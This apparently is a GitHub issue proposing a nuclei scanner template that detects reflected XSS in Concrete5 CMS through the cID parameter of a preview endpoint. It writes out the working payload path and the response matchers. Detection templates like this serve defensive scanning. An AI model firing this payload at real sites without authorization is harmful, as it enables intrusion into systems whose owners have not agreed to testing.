### ISSUE TITLE
[nuclei-template] Concrete5 XSS

### ISSUE THREAD

**Issue by shifa123** [projectdiscovery/nuclei-templates#1412]
**Concrete5 CMS XSS is vulnerable to Reflected XSS using vulnerable param cID**

```yaml

--- 
id: Concrete-CMS-XSS
info: 
  author: "shifacyclewla,hackergautam"
  description: "The Concrete CMS is vulnerable to Reflected XSS using vulnerable param cID\n"
  name: "Concrete CMS XSS"
  reference: "- https://twitter.com/JacksonHHax/status/1389222207805661187\n"
  severity: medium
  tags: "concrete,xss"
requests: 
  - 
    matchers: 
      - 
        part: body
        type: word
        words: 
          - "</iframe><svg/onload=alert(1)>"
      - 
        part: header
        type: word
        words: 
          - "text/html"
      - 
        status: 
          - 200
        type: status
    matchers-condition: and
    method: GET
    path: 
      - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert(1)>'
```
